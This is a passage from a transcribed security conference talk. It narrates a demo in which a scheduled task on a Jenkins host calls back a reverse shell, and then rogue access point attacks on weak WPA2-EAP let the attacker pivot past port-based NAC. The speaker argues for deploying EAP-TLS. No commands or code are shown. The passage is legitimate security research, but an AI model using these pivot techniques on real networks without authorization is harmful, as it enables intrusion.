works very nicely for this, although it’s also really loud.  It touches disks so so in a real scenario you want to use something that lives purely in memory. But I like scheduled tasks because it’s like easy to explain uh for doing for doing like a talk. So. And and you can see now we we’ve executed the the command hostname and the command who am I. We have entity authority pri..privileges on Jenkins up here on the top left. So, we’re we’re going to execute the scheduled task and we’re going to set the timer for for 2 minutes in the future. And you know something really interesting  happened when I when I was recording this. Um, I actually forgot connect the uh uh attach the the the virtual interface that was attached to my USB wifi adapter for the for the for the the nick that was connected to uh the the the target network. Uh, so I was going to start clearing  this just just like start the recording over and over again.  But something very interesting happened  and that’s when I um uh I actually had set 160 retries on that reverse schel. Uh for some reason that I that I don’t know why it did that but, um. So one, the second I reattached it the reverse schel just suddenly appeared and suddenly worked.  So I thought that was kind of cool so  I left it in there.  And it kind of proves an interesting point about um you know   good implants is that they’ll kinds of doggedly try to you know get back to the attacker even if they don’t can’t immediately do so. But, yeah. You’r we’re going to fast forward a little bit. And you see here that we’ve executed the uh, the scheduled task… and..I’m sure you don’t want to sit here.  You can see me wiggling my mouse because  I was totally bored waiting for this task to execute and I’m not going to do that to you guys as well. So I’m going to try to loop through that as much as  I can. Alright.  At at some point this is when I realize that oh, yeah, I didn’t connect this thing. So I I fixed the problem by attaching the network adaptor. So very, very jerk moment there. Um, and then I started getting ready to to uh start this recording all over again. Right? So I started cleaning the terminals and then I go back to um to empire here and I start going back to the main menu and oh, wait! There’s the reverse schel. Alright, so now we’ve received the second reverse schel this time on the target network and we’ve now now can use this. Uh we’re going to interact with that  that that agent that’s now living on the target machine and we’ve we’ve just pivoted into you know from one VLEN to the other. So, that’s indirect wire wireless pivot and the equivalent technique, I mean it’s actually really like straightforward.  It’s not very complicated. The equivalent technique in a wired network would be to unplug an authorized device from the wall and just connect it to a hostile network on which you can actually attack it. And you know um the reason you could do this is because port-based access controls uh they rely on the assumption that the physical layer can be trusted.  In a wireless network, uh, WPA is the uh means through which the integrity of the physical layer is protected. So if you’re using a weak form of WPA2-EAP uh the attacker can actually freely control the physical layer using rogue access point attacks and this renders port-based MAC NAC mechanisms useless. So what this demonstrates is that ports port-based NAC mechanisms uh do not effectively mitigate the risk presented by weak WPA2-EAP implementations. Um, furthermore, uh it demonstrates that adding port-based NAC mechanisms to a wireless network does not make the use of EAP-TTLS or EAP-PEAP any less in..inappropriate if the network is question is used to grant access to sensitive information. And finally, um, um uh yeah, oh well.  Finally, finally, OK. I guess this is another… I thought there was another slide there.  Whatever.  OK so um yeah. So by the way when we’re talking about sensitive information..heh heh, it’s Sunday.  Um when when we talk about sensitive information um, we’re usually referring to PCI or HIPAA data. Uh, but you know.  It’s important to remember that compliance doesn’t necessarily you know mean security. So I’m going to make like one last case for EAP-TLS. Um it it it it still is pretty painful, but it’s not as bad as it used to be. Uh, you can use a group policy to configure 802 dot1x clients. And that I think that’s pretty cool. I I think your best options is to use a private CA. Uh, you know you can you can lev..leverage active directory to deploy EAP-TLS. And if you have a a BYOD um processes that you have to worry about uh for that you could just use a solid MDM solution.  Um, or or even just you know relay your BY on  your onboarding solution uh to make that work. You can even use let’s encrypt to to employ EAP-TLS. Although, to be honest even the folks at let’s encrypt state that this is far from the best solution out there. As in like you can technically do this, but.. Uh so just some closing thoughts.  Uh just because you know wireless and wire wired networks operate similarly at the logical level and and that’s that’s by design.  You you want you don’t want to have to uh fundamentally think about your networks differently depending on what what physical medium you’re working with. Um that that does not mean that they work the same  way at the physical level. And you know um you have to remember that when we’re designing uh security mechanisms that are designed to protect these things. And also as a community,  uh we should really question whether or not it is a sound business decision to neglect EAP-TLS in favor of a more reactive approach that focussed on access control or threat containment. And you know finally, um if if there’s one thing  to take away from this is that needs for convenience and security are often you know at odds with one another. You know, be honest with yourselves. Maintain a healthy skepticism toward proposed solutions that promise both. And if you want to check out the attacks and try to implement them yourself uh, relevant the the tool question is github dot com slash solstice slash eap hammer.  And that’s it.  Thank you
[applause]